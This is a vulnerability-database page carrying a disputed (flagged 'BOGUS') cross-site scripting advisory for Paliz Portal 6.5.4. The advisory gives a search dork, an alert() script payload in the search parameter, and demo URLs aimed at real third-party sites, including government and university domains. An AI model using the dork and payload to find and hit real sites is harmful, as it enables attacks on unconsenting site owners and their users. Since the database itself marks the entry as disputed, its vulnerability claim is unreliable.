WARNING! Fake news / Disputed / BOGUS

Paliz Portal 6.5.4 Cross Site Scripting vulnerability

2013.07.03
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + Exploit Title: Paliz Portal v6.5.4 Cross Site Scripting vulnerability # # + Exploit Author: Ashiyane Digital Security Team # # + Home : www.Ashiyane.org # # + Vendor Homepage: www.palizct.com # # + Version: 6.5.4 # # + Category: Web Application # # + Tested on: Windows 7 # # + Dork: inurl:"Page=search/advancedsearch" # # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # + Location:site/Page.aspx?search=%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E&mID=1442&Page=search/advancedsearch[Xss] # + DEm0:http://mobinXnet.ir/Page.aspx?search=%3Cscript%3Ealert%28/tr0janman/%29;%3C/script%3E&mID=1442&Page=search/advancedsearch[Xss] + DEm0:http://www.tazirXat.gov.ir/Page.aspx?search=%3Cscript%3Ealert%28/tr0janman/%29;%3C/script%3E&mID=1442&Page=search/advancedsearch&init[Xss] + DEm0:http://www.gumsX.ac.ir/Page.aspx?search=%3Cscript%3Ealert%28/tr0janman/%29;%3C/script%3E&mID=1442&Page=search/advancedsearch[Xss] + DEm0:http://koXoy.ut.ac.ir/Page.aspx?search=%3Cscript%3Ealert%28/tr0janman/%29;%3C/script%3E&mID=1442&Page=search/advancedsearch[Xss] + DEm0:http://www.irXobacco.com/portal/newsite/Page.aspx?search=%3Cscript%3Ealert%28/tr0janman/%29;%3C/script%3E&mID=1442&Page=search/advancedsearch[Xss] ====================================== * Greetz to: My Lord Allah * Sp Tnx To: Behrooz_Ice,Q7X,Ali_Eagle,Azazel,iman_taktaz,sha2ow,am118,PrinceofHacking,Alireza66,Amirh03in and all Ashiyane Security [ Researcher Team AND Deface Team ] * The Last One : My Self, tr0janman ******* --------------------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top